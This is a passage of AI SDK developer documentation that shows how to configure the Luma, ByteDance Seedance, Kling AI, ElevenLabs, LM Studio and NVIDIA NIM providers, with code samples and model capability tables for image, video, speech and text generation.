          mediaType: 'application/pdf',
          filename: 'ai.pdf', // optional
        },
      ],
    },
  ],
});

You can also pass the URL of a PDF:

{
  type: 'file',
  data: new URL('https://example.com/document.pdf'),
  mediaType: 'application/pdf',
  filename: 'document.pdf', // optional
}

The model will have access to the contents of the PDF file and respond to questions about it.

Model Capabilities

Model	Image Input	Object Generation	Tool Usage	Tool Streaming
`sonar-deep-research`
`sonar-reasoning-pro`
`sonar-reasoning`
`sonar-pro`
`sonar`

title: Luma description: Learn how to use Luma AI models with the AI SDK.

Luma Provider

Setup

The Luma provider is available via the @ai-sdk/luma module. You can install it with

Provider Instance

You can import the default provider instance luma from @ai-sdk/luma:

import { luma } from '@ai-sdk/luma';

If you need a customized setup, you can import createLuma and create a provider instance with your settings:

import { createLuma } from '@ai-sdk/luma';

const luma = createLuma({
  apiKey: 'your-api-key', // optional, defaults to LUMA_API_KEY environment variable
  baseURL: 'custom-url', // optional
  headers: {
    /* custom headers */
  }, // optional
});

You can use the following optional settings to customize the Luma provider instance:

baseURL string

Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.lumalabs.ai.
apiKey string

API key that is being sent using the Authorization header. It defaults to the LUMA_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Image Models

You can create Luma image models using the .image() factory method. For more on image generation with the AI SDK see generateImage().

Basic Usage

import { luma, type LumaImageModelOptions } from '@ai-sdk/luma';
import { generateImage } from 'ai';
import fs from 'fs';

const { image } = await generateImage({
  model: luma.image('photon-1'),
  prompt: 'A serene mountain landscape at sunset',
  aspectRatio: '16:9',
});

const filename = `image-${Date.now()}.png`;
fs.writeFileSync(filename, image.uint8Array);
console.log(`Image saved to ${filename}`);

Image Model Settings

You can customize the generation behavior with optional settings:

const { image } = await generateImage({
  model: luma.image('photon-1'),
  prompt: 'A serene mountain landscape at sunset',
  aspectRatio: '16:9',
  maxImagesPerCall: 1, // Maximum number of images to generate per API call
  providerOptions: {
    luma: {
      pollIntervalMillis: 5000, // How often to check for completed images (in ms)
      maxPollAttempts: 10, // Maximum number of polling attempts before timeout
    },
  } satisfies LumaImageModelOptions,
});

Since Luma processes images through an asynchronous queue system, these settings allow you to tune the polling behavior:

maxImagesPerCall number

Override the maximum number of images generated per API call. Defaults to 1.
pollIntervalMillis number

Control how frequently the API is checked for completed images while they are being processed. Defaults to 500ms.
maxPollAttempts number

Limit how long to wait for results before timing out, since image generation is queued asynchronously. Defaults to 120 attempts.

Model Capabilities

Luma offers two main models:

Model	Description
`photon-1`	High-quality image generation with superior prompt understanding
`photon-flash-1`	Faster generation optimized for speed while maintaining quality

Both models support the following aspect ratios:

1:1
3:4
4:3
9:16
16:9 (default)
9:21
21:9

For more details about supported aspect ratios, see the Luma Image Generation documentation.

Key features of Luma models include:

Ultra-high quality image generation
10x higher cost efficiency compared to similar models
Superior prompt understanding and adherence
Unique character consistency capabilities from single reference images
Multi-image reference support for precise style matching

Image editing

Luma supports different modes of generating images that reference other images.

Modify an image

Images have to be passed as URLs. weight can be configured for each image in the providerOptions.luma.images array.

await generateImage({
  model: luma.image('photon-flash-1'),
  prompt: {
    text: 'transform the bike to a boat',
    images: [
      'https://hebbkx1anhila5yf.public.blob.vercel-storage.com/future-me-8hcBWcZOkbE53q3gshhEm16S87qDpF.jpeg',
    ],
  },
  providerOptions: {
    luma: {
      referenceType: 'modify_image',
      images: [{ weight: 1.0 }],
    } satisfies LumaImageModelOptions,
  },
});

Learn more at https://docs.lumalabs.ai/docs/image-generation#modify-image.

Reference an image

await generateImage({
  model: luma.image('photon-flash-1'),
  prompt: {
    text: 'A salamander at dusk in a forest pond, in the style of ukiyo-e',
    images: [
      'https://hebbkx1anhila5yf.public.blob.vercel-storage.com/future-me-8hcBWcZOkbE53q3gshhEm16S87qDpF.jpeg',
    ],
  },
  aspectRatio: '1:1',
  providerOptions: {
    luma: {
      referenceType: 'image',
      images: [{ weight: 0.8 }],
    } satisfies LumaImageModelOptions,
  },
});

Learn more at https://docs.lumalabs.ai/docs/image-generation#image-reference

Style Reference

Apply specific visual styles to your generations using reference images. Control the style influence using the weight parameter.

await generateImage({
  model: luma.image('photon-flash-1'),
  prompt: {
    text: 'A blue cream Persian cat launching its website on Vercel',
    images: [
      'https://hebbkx1anhila5yf.public.blob.vercel-storage.com/future-me-8hcBWcZOkbE53q3gshhEm16S87qDpF.jpeg',
    ],
  },
  aspectRatio: '1:1',
  providerOptions: {
    luma: {
      referenceType: 'style',
      images: [{ weight: 0.8 }],
    } satisfies LumaImageModelOptions,
  },
});

Learn more at https://docs.lumalabs.ai/docs/image-generation#style-reference

Character Reference

Create consistent and personalized characters using up to 4 reference images of the same subject. More reference images improve character representation.

await generateImage({
  model: luma.image('photon-flash-1'),
  prompt: {
    text: 'A woman with a cat riding a broomstick in a forest',
    images: [
      'https://hebbkx1anhila5yf.public.blob.vercel-storage.com/future-me-8hcBWcZOkbE53q3gshhEm16S87qDpF.jpeg',
    ],
  },
  aspectRatio: '1:1',
  providerOptions: {
    luma: {
      referenceType: 'character',
      images: [
        {
          id: 'identity0',
        },
      ],
    } satisfies LumaImageModelOptions,
  },
});

Learn more at https://docs.lumalabs.ai/docs/image-generation#character-reference

title: ByteDance description: Learn how to use ByteDance Seedance video models with the AI SDK.

ByteDance Provider

Setup

The ByteDance provider is available via the @ai-sdk/bytedance module. You can install it with

Provider Instance

You can import the default provider instance byteDance from @ai-sdk/bytedance:

import { byteDance } from '@ai-sdk/bytedance';

If you need a customized setup, you can import createByteDance and create a provider instance with your settings:

import { createByteDance } from '@ai-sdk/bytedance';

const byteDance = createByteDance({
  apiKey: 'your-api-key', // optional, defaults to ARK_API_KEY environment variable
  baseURL: 'custom-url', // optional
  headers: {
    /* custom headers */
  }, // optional
});

You can use the following optional settings to customize the ByteDance provider instance:

baseURL string

Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://ark.ap-southeast.bytepluses.com/api/v3.
apiKey string

API key that is being sent using the Authorization header. It defaults to the ARK_API_KEY environment variable. You can obtain an API key from the BytePlus console.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Video Models

You can create ByteDance video models using the .video() factory method. For more on video generation with the AI SDK see generateVideo().

Text-to-Video

Generate videos from text prompts:

import {
  byteDance,
  type ByteDanceVideoProviderOptions,
} from '@ai-sdk/bytedance';
import { experimental_generateVideo as generateVideo } from 'ai';

const { video } = await generateVideo({
  model: byteDance.video('seedance-1-0-pro-250528'),
  prompt:
    'Photorealistic style: Under a clear blue sky, a vast expanse of white daisy fields stretches out. The camera gradually zooms in and fixates on a close-up of a single daisy.',
  aspectRatio: '16:9',
  duration: 5,
  providerOptions: {
    bytedance: {
      watermark: false,
    } satisfies ByteDanceVideoProviderOptions,
  },
});

console.log(video.url);

Image-to-Video

Generate videos from a first-frame image with an optional text prompt:

import {
  byteDance,
  type ByteDanceVideoProviderOptions,
} from '@ai-sdk/bytedance';
import { experimental_generateVideo as generateVideo } from 'ai';

const { video } = await generateVideo({
  model: byteDance.video('seedance-1-5-pro-251215'),
  prompt: {
    image: 'https://example.com/first-frame.png',
    text: 'The cat slowly turns its head and blinks',
  },
  duration: 5,
  providerOptions: {
    bytedance: {
      watermark: false,
    } satisfies ByteDanceVideoProviderOptions,
  },
});

Image-to-Video with Audio

Seedance 1.5 Pro supports generating synchronized audio alongside the video:

import {
  byteDance,
  type ByteDanceVideoProviderOptions,
} from '@ai-sdk/bytedance';
import { experimental_generateVideo as generateVideo } from 'ai';

const { video } = await generateVideo({
  model: byteDance.video('seedance-1-5-pro-251215'),
  prompt: {
    image: 'https://example.com/pianist.png',
    text: 'A young man sits at a piano, playing calmly. Gentle piano music plays in sync with his movements.',
  },
  duration: 5,
  providerOptions: {
    bytedance: {
      generateAudio: true,
      watermark: false,
    } satisfies ByteDanceVideoProviderOptions,
  },
});

First-and-Last Frame Video

Generate smooth transitions between a starting and ending keyframe image:

import {
  byteDance,
  type ByteDanceVideoProviderOptions,
} from '@ai-sdk/bytedance';
import { experimental_generateVideo as generateVideo } from 'ai';

const { video } = await generateVideo({
  model: byteDance.video('seedance-1-5-pro-251215'),
  prompt: {
    image: 'https://example.com/first-frame.jpg',
    text: 'Create a 360-degree orbiting camera shot based on this photo',
  },
  duration: 5,
  providerOptions: {
    bytedance: {
      lastFrameImage: 'https://example.com/last-frame.jpg',
      generateAudio: true,
      watermark: false,
    } satisfies ByteDanceVideoProviderOptions,
  },
});

Multi-Reference Image-to-Video

Using the Seedance 1.0 Lite I2V model, you can provide multiple reference images (1-4) that the model uses to faithfully reproduce object shapes, colors, and textures:

import {
  byteDance,
  type ByteDanceVideoProviderOptions,
} from '@ai-sdk/bytedance';
import { experimental_generateVideo as generateVideo } from 'ai';

const { video } = await generateVideo({
  model: byteDance.video('seedance-1-0-lite-i2v-250428'),
  prompt:
    'A boy wearing glasses and a blue T-shirt from [Image 1] and a corgi dog from [Image 2], sitting on the lawn from [Image 3], in 3D cartoon style',
  aspectRatio: '16:9',
  duration: 5,
  providerOptions: {
    bytedance: {
      referenceImages: [
        'https://example.com/boy.png',
        'https://example.com/corgi.png',
        'https://example.com/lawn.png',
      ],
      watermark: false,
    } satisfies ByteDanceVideoProviderOptions,
  },
});

Reference Video

Seedance 2.0 supports reference videos that guide the style, motion, or composition of the generated video:

import {
  byteDance,
  type ByteDanceVideoProviderOptions,
} from '@ai-sdk/bytedance';
import { experimental_generateVideo as generateVideo } from 'ai';

const { video } = await generateVideo({
  model: byteDance.video('dreamina-seedance-2-0-260128'),
  prompt:
    'First-person perspective promotional ad, using the composition and camera movement from the reference video',
  aspectRatio: '16:9',
  duration: 4,
  providerOptions: {
    bytedance: {
      referenceVideos: ['https://example.com/reference-video.mp4'],
      watermark: false,
    } satisfies ByteDanceVideoProviderOptions,
  },
});

Reference Audio

Seedance 2.0 supports reference audio that is used as background music or sound for the generated video:

import {
  byteDance,
  type ByteDanceVideoProviderOptions,
} from '@ai-sdk/bytedance';
import { experimental_generateVideo as generateVideo } from 'ai';

const { video } = await generateVideo({
  model: byteDance.video('dreamina-seedance-2-0-260128'),
  prompt:
    'A serene mountain landscape at sunrise with gentle camera movement',
  aspectRatio: '16:9',
  duration: 4,
  providerOptions: {
    bytedance: {
      referenceAudio: ['https://example.com/background-music.mp3'],
      generateAudio: true,
      watermark: false,
    } satisfies ByteDanceVideoProviderOptions,
  },
});

Video Provider Options

The following provider options are available via providerOptions.bytedance:

Generation Options

watermark boolean

Whether to add a watermark to the generated video.
generateAudio boolean

Whether to generate synchronized audio for the video. Only supported by Seedance 1.5 Pro.
cameraFixed boolean

Whether to fix the camera during generation.
returnLastFrame boolean

Whether to return the last frame of the generated video. Useful for chaining consecutive videos.
serviceTier 'default' | 'flex'

Inference tier. 'default' for online inference. 'flex' for offline inference at 50% of the price, with higher latency (response times on the order of hours).
draft boolean

Enable draft sample mode for low-cost preview generation. Only supported by Seedance 1.5 Pro. Generates a 480p preview video for rapid iteration before committing to a full-quality generation.

Image Input Options

lastFrameImage string

URL of the last frame image for first-and-last frame video generation. The model generates smooth transitions between the first frame (provided via the image prompt) and this last frame. Supported by Seedance 1.5 Pro, 1.0 Pro, and 1.0 Lite I2V.
referenceImages string[]

Array of reference image URLs (1-4 images) for multi-reference image-to-video generation. The model extracts key features from each image and reproduces them in the video. Use [Image 1], [Image 2], etc. in your prompt to reference specific images. Supported by Seedance 1.0 Lite I2V.

Media Reference Options

referenceVideos string[]

Array of reference video URLs (up to 3 videos, max 15 seconds each) for reference-guided video generation. The model uses the referenced videos to guide style, motion, or composition. Supported by Seedance 2.0.
referenceAudio string[]

Array of reference audio URLs (up to 3, max 15 seconds each) for audio-guided video generation. The model uses the referenced audio as background music or synchronized sound. Supports data URIs (e.g., data:audio/wav;base64,...). Supported by Seedance 2.0.

Polling Options

pollIntervalMs number

Control how frequently the API is checked for completed videos while they are being processed. Defaults to 3000ms.
pollTimeoutMs number

Maximum time to wait for video generation to complete before timing out. Defaults to 300000ms (5 minutes).

Video Model Capabilities

Model	Model ID	Capabilities
Seedance 2.0	`dreamina-seedance-2-0-260128`	T2V, I2V, reference videos (up to 3), reference audio (up to 3), audio-video sync. Duration: 4-15s. Resolution: 480p, 720p.
Seedance 2.0 Fast	`dreamina-seedance-2-0-fast-260128`	T2V, I2V, reference videos (up to 3), reference audio (up to 3), audio-video sync. Optimized for speed. Duration: 4-15s. Resolution: 480p, 720p.
Seedance 1.5 Pro	`seedance-1-5-pro-251215`	T2V, I2V (first frame), I2V (first+last frame), audio-video sync, draft mode. Duration: 4-12s. Resolution: 480p, 720p, 1080p.
Seedance 1.0 Pro	`seedance-1-0-pro-250528`	T2V, I2V (first frame), I2V (first+last frame). Duration: 2-12s. Resolution: 480p, 720p, 1080p.
Seedance 1.0 Pro Fast	`seedance-1-0-pro-fast-251015`	T2V, I2V (first frame). Optimized for speed and cost. Duration: 2-12s.
Seedance 1.0 Lite (T2V)	`seedance-1-0-lite-t2v-250428`	Text-to-video only. Duration: 2-12s. Resolution: 480p, 720p, 1080p.
Seedance 1.0 Lite (I2V)	`seedance-1-0-lite-i2v-250428`	I2V (first frame), I2V (first+last frame), multi-reference images (1-4). Duration: 2-12s. Resolution: 480p, 720p.

Supported aspect ratios: 16:9, 4:3, 1:1, 3:4, 9:16, 21:9, adaptive (image-to-video only).

All models output MP4 video at 24 fps.

title: Kling AI description: Learn how to use the Kling AI provider for the AI SDK.

Kling AI Provider

The Kling AI provider contains support for Kling AI's video generation models, including text-to-video, image-to-video, motion control, and multi-shot video generation.

Setup

The Kling AI provider is available in the @ai-sdk/klingai module. You can install it with

Provider Instance

You can import the default provider instance klingai from @ai-sdk/klingai:

import { klingai } from '@ai-sdk/klingai';

If you need a customized setup, you can import createKlingAI from @ai-sdk/klingai and create a provider instance with your settings:

import { createKlingAI } from '@ai-sdk/klingai';

const klingai = createKlingAI({
  accessKey: 'your-access-key',
  secretKey: 'your-secret-key',
});

You can use the following optional settings to customize the Kling AI provider instance:

accessKey string

Kling AI access key. Defaults to the KLINGAI_ACCESS_KEY environment variable.
secretKey string

Kling AI secret key. Defaults to the KLINGAI_SECRET_KEY environment variable.
baseURL string

Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api-singapore.klingai.com.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Video Models

You can create Kling AI video models using the .video() factory method. For more on video generation with the AI SDK see generateVideo().

This provider currently supports three video generation modes: text-to-video, image-to-video, and motion control.

Text-to-Video

Generate videos from text prompts:

import { klingai, type KlingAIVideoModelOptions } from '@ai-sdk/klingai';
import { experimental_generateVideo as generateVideo } from 'ai';

const { videos } = await generateVideo({
  model: klingai.video('kling-v2.6-t2v'),
  prompt: 'A chicken flying into the sunset in the style of 90s anime.',
  aspectRatio: '16:9',
  duration: 5,
  providerOptions: {
    klingai: {
      mode: 'std',
    } satisfies KlingAIVideoModelOptions,
  },
});

Image-to-Video

Generate videos from a start frame image with an optional text prompt. The popular start+end frame feature is available via the imageTail option:

import { klingai, type KlingAIVideoModelOptions } from '@ai-sdk/klingai';
import { experimental_generateVideo as generateVideo } from 'ai';

const { videos } = await generateVideo({
  model: klingai.video('kling-v2.6-i2v'),
  prompt: {
    image: 'https://example.com/start-frame.png',
    text: 'The cat slowly turns its head and blinks',
  },
  duration: 5,
  providerOptions: {
    klingai: {
      // Pro mode required for start+end frame control
      mode: 'pro',
      // Optional: end frame image
      imageTail: 'https://example.com/end-frame.png',
    } satisfies KlingAIVideoModelOptions,
  },
});

Multi-Shot Video Generation

Generate videos with multiple storyboard shots, each with its own prompt and duration (Kling v3.0+):

import { klingai, type KlingAIVideoModelOptions } from '@ai-sdk/klingai';
import { experimental_generateVideo as generateVideo } from 'ai';

const { videos } = await generateVideo({
  model: klingai.video('kling-v3.0-t2v'),
  prompt: '',
  aspectRatio: '16:9',
  duration: 10,
  providerOptions: {
    klingai: {
      mode: 'pro',
      multiShot: true,
      shotType: 'customize',
      multiPrompt: [
        {
          index: 1,
          prompt: 'A sunrise over a calm ocean, warm golden light.',
          duration: '4',
        },
        {
          index: 2,
          prompt: 'A flock of seagulls take flight from the beach.',
          duration: '3',
        },
        {
          index: 3,
          prompt: 'Waves crash against rocky cliffs at sunset.',
          duration: '3',
        },
      ],
      sound: 'on',
    } satisfies KlingAIVideoModelOptions,
  },
});

Multi-shot also works with image-to-video by combining a start frame image with per-shot prompts.

Motion Control

Generate video by transferring motion from a reference video to a character image:

import { klingai, type KlingAIVideoModelOptions } from '@ai-sdk/klingai';
import { experimental_generateVideo as generateVideo } from 'ai';

const { videos } = await generateVideo({
  model: klingai.video('kling-v3.0-motion-control'),
  prompt: {
    image: 'https://example.com/character.png',
    text: 'The character performs a smooth dance move',
  },
  providerOptions: {
    klingai: {
      videoUrl: 'https://example.com/reference-motion.mp4',
      characterOrientation: 'image',
      mode: 'std',
      // Optional: reference element from element library (v3.0+, max 1)
      elementList: [{ element_id: 829836802793406551 }],
    } satisfies KlingAIVideoModelOptions,
  },
});

Video Provider Options

The following provider options are available via providerOptions.klingai. Options vary by mode — see the KlingAI Capability Map for per-model support.

Common Options

mode 'std' | 'pro'

Video generation mode. 'std' is cost-effective. 'pro' produces higher quality but takes longer.
pollIntervalMs number

Polling interval in milliseconds for checking task status. Defaults to 5000.
pollTimeoutMs number

Maximum wait time in milliseconds for video generation. Defaults to 600000 (10 minutes).
watermarkEnabled boolean

Whether to generate watermarked results simultaneously.

Text-to-Video and Image-to-Video Options

negativePrompt string

A description of what to avoid in the generated video (max 2500 characters).
sound 'on' | 'off'

Whether to generate audio simultaneously. Only V2.6 and subsequent models support this, and requires mode: 'pro'.
cfgScale number

Flexibility in video generation. Higher values mean stronger prompt adherence. Range: [0, 1]. Not supported by V2.x models.
cameraControl object

Camera movement control with a type preset ('simple', 'down_back', 'forward_up', 'right_turn_forward', 'left_turn_forward') and optional config with horizontal, vertical, pan, tilt, roll, zoom values (range: [-10, 10]).
multiShot boolean

Enable multi-shot video generation (Kling v3.0+). When true, the video is split into up to 6 storyboard shots with individual prompts and durations.
shotType 'customize' | 'intelligence'

Storyboard method for multi-shot generation. 'customize' uses multiPrompt for user-defined shots. 'intelligence' lets the model auto-segment based on the main prompt. Required when multiShot is true.
multiPrompt Array<{index, prompt, duration}>

Per-shot details for multi-shot generation. Each shot has an index (number), prompt (string, max 512 characters), and duration (string, in seconds). Shot durations must sum to the total duration. Required when multiShot is true and shotType is 'customize'.
voiceList Array<{voice_id: string}>

Voice references for voice control (Kling v3.0+). Up to 2 voices. Reference via <<<voice_1>>> template syntax in the prompt. Requires sound: 'on'. Cannot coexist with elementList on the I2V endpoint.

Image-to-Video Only Options

imageTail string

End frame image for start+end frame control. Accepts an image URL or raw base64-encoded data. Requires mode: 'pro' for most models.
staticMask string

Static brush mask image for motion brush. Accepts an image URL or raw base64-encoded data.
dynamicMasks Array

Dynamic brush configurations for motion brush. Up to 6 groups, each with a mask (image URL or base64) and trajectories (array of {x, y} coordinates).

Image-to-Video and Motion Control Options

elementList Array<{element_id: number}>

Reference elements for element control (Kling v3.0+). Supports video character elements and multi-image elements. Up to 3 elements for I2V (cannot coexist with voiceList). Up to 1 element for motion control.

Motion Control Only Options

videoUrl string (required)

URL of the reference motion video. Supports .mp4/.mov, max 100MB, duration 3–30 seconds.
characterOrientation 'image' | 'video' (required)

Orientation of the characters in the generated video. 'image' matches the reference image orientation (max 10s video). 'video' matches the reference video orientation (max 30s video).
keepOriginalSound 'yes' | 'no'

Whether to keep the original sound from the reference video. Defaults to 'yes'.

Video Model Capabilities

Text-to-Video

Model	Description
`kling-v3.0-t2v`	Latest v3.0, multi-shot, voice control, sound (3-15s)
`kling-v2.6-t2v`	V2.6, sound in pro mode
`kling-v2.5-turbo-t2v`	Optimized for speed, std and pro
`kling-v2.1-master-t2v`	High-quality generation, pro only
`kling-v2-master-t2v`	Master-quality generation
`kling-v1.6-t2v`	V1.6 generation, std and pro
`kling-v1-t2v`	Original V1 model, supports camera control (std)

Image-to-Video

Model	Description
`kling-v3.0-i2v`	Latest v3.0, multi-shot, element/voice control, sound (3-15s)
`kling-v2.6-i2v`	V2.6, sound and end-frame in pro mode
`kling-v2.5-turbo-i2v`	Optimized for speed, end-frame in pro
`kling-v2.1-master-i2v`	High-quality generation, pro only
`kling-v2.1-i2v`	V2.1 generation, end-frame in pro
`kling-v2-master-i2v`	Master-quality generation
`kling-v1.6-i2v`	V1.6 generation, end-frame in pro
`kling-v1.5-i2v`	V1.5 generation, end-frame and motion brush in pro
`kling-v1-i2v`	Original V1 model, end-frame and motion brush in std/pro

Motion Control

Model	Description
`kling-v3.0-motion-control`	Latest v3.0, enhanced facial consistency via element binding
`kling-v2.6-motion-control`	Transfers motion from a reference video to a character image

title: ElevenLabs description: Learn how to use the ElevenLabs provider for the AI SDK.

ElevenLabs Provider

The ElevenLabs provider contains language model support for the ElevenLabs transcription and speech generation APIs.

Setup

The ElevenLabs provider is available in the @ai-sdk/elevenlabs module. You can install it with

Provider Instance

You can import the default provider instance elevenlabs from @ai-sdk/elevenlabs:

import { elevenlabs } from '@ai-sdk/elevenlabs';

If you need a customized setup, you can import createElevenLabs from @ai-sdk/elevenlabs and create a provider instance with your settings:

import { createElevenLabs } from '@ai-sdk/elevenlabs';

const elevenlabs = createElevenLabs({
  // custom settings, e.g.
  fetch: customFetch,
});

You can use the following optional settings to customize the ElevenLabs provider instance:

apiKey string

API key that is being sent using the Authorization header. It defaults to the ELEVENLABS_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Speech Models

You can create models that call the ElevenLabs speech API using the .speech() factory method.

The first argument is the model id e.g. eleven_multilingual_v2.

const model = elevenlabs.speech('eleven_multilingual_v2');

The voice argument can be set to a voice ID from the ElevenLabs Voice Library. You can find voice IDs by selecting a voice in the library and copying its ID.

import { experimental_generateSpeech as generateSpeech } from 'ai';
import { elevenlabs } from '@ai-sdk/elevenlabs';

const result = await generateSpeech({
  model: elevenlabs.speech('eleven_multilingual_v2'),
  text: 'Hello, world!',
  voice: '21m00Tcm4TlvDq8ikWAM', // Rachel voice
});

You can also pass additional provider-specific options using the providerOptions argument:

import { experimental_generateSpeech as generateSpeech } from 'ai';
import {
  elevenlabs,
  type ElevenLabsSpeechModelOptions,
} from '@ai-sdk/elevenlabs';

const result = await generateSpeech({
  model: elevenlabs.speech('eleven_multilingual_v2'),
  text: 'Hello, world!',
  voice: '21m00Tcm4TlvDq8ikWAM',
  providerOptions: {
    elevenlabs: {
      voiceSettings: {
        stability: 0.5,
        similarityBoost: 0.75,
      },
    } satisfies ElevenLabsSpeechModelOptions,
  },
});

languageCode string or null
Optional. Language code (ISO 639-1) used to enforce a language for the model. Currently, only Turbo v2.5 and Flash v2.5 support language enforcement. For other models, providing a language code will result in an error.
voiceSettings object or null
Optional. Voice settings that override stored settings for the given voice. These are applied only to the current request.
- stability double or null
  Optional. Determines how stable the voice is and the randomness between each generation. Lower values introduce broader emotional range; higher values result in a more monotonous voice.
- useSpeakerBoost boolean or null
  Optional. Boosts similarity to the original speaker. Increases computational load and latency.
- similarityBoost double or null
  Optional. Controls how closely the AI should adhere to the original voice.
- style double or null
  Optional. Amplifies the style of the original speaker. May increase latency if set above 0.
pronunciationDictionaryLocators array of objects or null
Optional. A list of pronunciation dictionary locators to apply to the text, in order. Up to 3 locators per request.
Each locator object:
- pronunciationDictionaryId string (required)
  The ID of the pronunciation dictionary.
- versionId string or null (optional)
  The version ID of the dictionary. If not provided, the latest version is used.
seed integer or null
Optional. If specified, the system will attempt to sample deterministically. Must be between 0 and 4294967295. Determinism is not guaranteed.
previousText string or null
Optional. The text that came before the current request's text. Can improve continuity when concatenating generations or influence current generation continuity.
nextText string or null
Optional. The text that comes after the current request's text. Can improve continuity when concatenating generations or influence current generation continuity.
previousRequestIds array of strings or null
Optional. List of request IDs for samples generated before this one. Improves continuity when splitting large tasks. Max 3 IDs. If both previousText and previousRequestIds are sent, previousText is ignored.
nextRequestIds array of strings or null
Optional. List of request IDs for samples generated after this one. Useful for maintaining continuity when regenerating a sample. Max 3 IDs. If both nextText and nextRequestIds are sent, nextText is ignored.
applyTextNormalization enum
Optional. Controls text normalization.
Allowed values: 'auto' (default), 'on', 'off'.
- 'auto': System decides whether to apply normalization (e.g., spelling out numbers).
- 'on': Always apply normalization.
- 'off': Never apply normalization.
  For eleven_turbo_v2_5 and eleven_flash_v2_5, can only be enabled with Enterprise plans.
applyLanguageTextNormalization boolean
Optional. Defaults to false. Controls language text normalization, which helps with proper pronunciation in some supported languages (currently only Japanese). May significantly increase latency.
enableLogging boolean
Optional. Whether to enable request logging for this API call. Defaults to the account-level setting.

Model Capabilities

Model	Instructions
`eleven_v3`
`eleven_multilingual_v2`
`eleven_flash_v2_5`
`eleven_flash_v2`
`eleven_turbo_v2_5`
`eleven_turbo_v2`
`eleven_monolingual_v1`
`eleven_multilingual_v1`

Transcription Models

You can create models that call the ElevenLabs transcription API using the .transcription() factory method.

The first argument is the model id e.g. scribe_v1.

const model = elevenlabs.transcription('scribe_v1');

import { experimental_transcribe as transcribe } from 'ai';
import {
  elevenlabs,
  type ElevenLabsTranscriptionModelOptions,
} from '@ai-sdk/elevenlabs';

const result = await transcribe({
  model: elevenlabs.transcription('scribe_v1'),
  audio: new Uint8Array([1, 2, 3, 4]),
  providerOptions: {
    elevenlabs: {
      languageCode: 'en',
    } satisfies ElevenLabsTranscriptionModelOptions,
  },
});

The following provider options are available:

languageCode string

An ISO-639-1 or ISO-639-3 language code corresponding to the language of the audio file. Can sometimes improve transcription performance if known beforehand. Defaults to null, in which case the language is predicted automatically.
tagAudioEvents boolean

Whether to tag audio events like (laughter), (footsteps), etc. in the transcription. Defaults to true.
numSpeakers integer

The maximum amount of speakers talking in the uploaded file. Can help with predicting who speaks when. The maximum amount of speakers that can be predicted is 32. Defaults to null, in which case the amount of speakers is set to the maximum value the model supports.
timestampsGranularity enum

The granularity of the timestamps in the transcription. Defaults to 'word'. Allowed values: 'none', 'word', 'character'.
diarize boolean

Whether to annotate which speaker is currently talking in the uploaded file. Defaults to true.
fileFormat enum

The format of input audio. Defaults to 'other'. Allowed values: 'pcm_s16le_16', 'other'. For 'pcm_s16le_16', the input audio must be 16-bit PCM at a 16kHz sample rate, single channel (mono), and little-endian byte order. Latency will be lower than with passing an encoded waveform.

Model Capabilities

Model	Transcription	Duration	Segments	Language
`scribe_v1`
`scribe_v1_experimental`

title: LM Studio description: Use the LM Studio OpenAI compatible API with the AI SDK.

LM Studio Provider

LM Studio is a user interface for running local models.

It contains an OpenAI compatible API server that you can use with the AI SDK. You can start the local server under the Local Server tab in the LM Studio UI ("Start Server" button).

Setup

The LM Studio provider is available via the @ai-sdk/openai-compatible module as it is compatible with the OpenAI API. You can install it with

Provider Instance

To use LM Studio, you can create a custom provider instance with the createOpenAICompatible function from @ai-sdk/openai-compatible:

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';

const lmstudio = createOpenAICompatible({
  name: 'lmstudio',
  baseURL: 'http://localhost:1234/v1',
});

Language Models

You can interact with local LLMs in LM Studio using a provider instance. The first argument is the model id, e.g. llama-3.2-1b.

const model = lmstudio('llama-3.2-1b');

To be able to use a model, you need to download it first.

Example

You can use LM Studio language models to generate text with the generateText function:

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { generateText } from 'ai';

const lmstudio = createOpenAICompatible({
  name: 'lmstudio',
  baseURL: 'https://localhost:1234/v1',
});

const { text } = await generateText({
  model: lmstudio('llama-3.2-1b'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
  maxRetries: 1, // immediately error if the server is not running
});

LM Studio language models can also be used with streamText.

Embedding Models

You can create models that call the LM Studio embeddings API using the .embeddingModel() factory method.

const model = lmstudio.embeddingModel('text-embedding-nomic-embed-text-v1.5');

Example - Embedding a Single Value

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { embed } from 'ai';

const lmstudio = createOpenAICompatible({
  name: 'lmstudio',
  baseURL: 'https://localhost:1234/v1',
});

// 'embedding' is a single embedding object (number[])
const { embedding } = await embed({
  model: lmstudio.embeddingModel('text-embedding-nomic-embed-text-v1.5'),
  value: 'sunny day at the beach',
});

Example - Embedding Many Values

When loading data, e.g. when preparing a data store for retrieval-augmented generation (RAG), it is often useful to embed many values at once (batch embedding).

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { embedMany } from 'ai';

const lmstudio = createOpenAICompatible({
  name: 'lmstudio',
  baseURL: 'https://localhost:1234/v1',
});

// 'embeddings' is an array of embedding objects (number[][]).
// It is sorted in the same order as the input values.
const { embeddings } = await embedMany({
  model: lmstudio.embeddingModel('text-embedding-nomic-embed-text-v1.5'),
  values: [
    'sunny day at the beach',
    'rainy afternoon in the city',
    'snowy night in the mountains',
  ],
});

title: NVIDIA NIM description: Use NVIDIA NIM OpenAI compatible API with the AI SDK.

NVIDIA NIM Provider

NVIDIA NIM provides optimized inference microservices for deploying foundation models. It offers an OpenAI-compatible API that you can use with the AI SDK.

Setup

